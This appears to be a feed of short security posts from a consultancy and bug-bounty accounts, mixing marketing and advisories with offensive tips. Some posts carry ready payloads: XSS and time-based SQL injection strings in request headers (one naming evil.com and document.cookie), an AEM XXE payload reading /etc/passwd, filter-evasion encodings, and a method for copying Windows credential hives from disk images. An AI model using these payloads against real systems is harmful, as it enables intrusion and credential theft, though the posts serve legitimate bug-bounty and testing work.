[+] FIlter bypass techniques: Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;) #AEMSecurity #FilterBypass #bugbountytips #bugbountytip

[+] Using Google dorks for unique subdomains? Try this: site:*-*-*.yourtarget.com site:*-*.*.yourtarget.com site:*.*.*.yourtarget.com #bugbountytips #bugbountytip #AEMSecurity

From detecting zero-day vulnerabilities to ensuring compliance with international standards, NXTL Solutions delivers the cybersecurity your business needs to thrive. Ready to protect your infrastructure? #ZeroDay #CyberProtection #NXTLSolutions

Nearly 72% of detections come from just two sectors. Do you know what they are? #CyberTraining #BusinessSecurity #nxtlsolutions #MaritimeSecurity #protectpatientdata #datasecurity

Our Red Team’s mission is to challenge and enhance cybersecurity defenses. Recently, we identified a method to bypass Cloudflare WAF’s XSS Protection using a unique payload, shedding light on potential security gaps in one of the most widely used web application firewalls.

Did you know that 7z can browse .VHD and .VMDK files? You can open them right up, and even directly browse ntfs filesystems. On a pentest and find a bunch of disk images? Copy the SAM/SECURITY/SYSTEM hives directly from the images, no mounting, copying, or fussing around.

Beware of fake browser update prompts! Cybercriminals are using #WarmCookie malware to trick users into downloading malicious software. Verify updates only through official channels. Stay safe! #NXTLSolutions #OnlineSafety #MalwareAlert #CyberSecurity

A 0-click pre-auth RCE (root) exploit was released on 27th October and is being actively exploited. If anyone is using LiteSpeed Cyberpanel that is publicly accessible right now, immediately upgrade it to the latest version 2.3.7 #NXTLSolutions #CyberSecurity #Cyberpanel

pandora: A red team tool to extract credentials from password managers meterpreter.org/pandora-a-red-…

Header based injection: X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)> X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Referer:

Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity

#BugBountyTip #1: When hunting for #XSS in single-page apps (SPAs), don’t just look at the front end. Check the app’s JavaScript frameworks for unprotected DOM manipulations and unsafe sanitization practices. #BugBountyTips #NXTLSolutions

#BugBountyTip #2: Filter Evasion Test with different encoding schemes for bypassing filters, such as using HTML entities (`&#x3C;` for `<`), or testing with UTF-16 encodings. Encoding obfuscation can help when bypassing filters in certain contexts #BugBountyTips #NXTLSolutions

URLFinder has just landed in the Trickest Library 🚀 URLFinder brings high-speed, passive URL discovery tool to your custom automation workflows: 🔹 Passive source discovery 🔹 JSON/file/stdout output 🔹 Optimized speed & efficiency github.com/projectdiscove…

🔓 1.6 Million WordPress Logins - Data Leak Exposed A leak of 1.6 million WordPress login credentials, including usernames and passwords, has surfaced on the dark web. The compromised data increases the risk of unauthorized access to websites, identity theft, and potential

[+] #BugbountyTip Take your time, Do Not Rush! Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips

AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity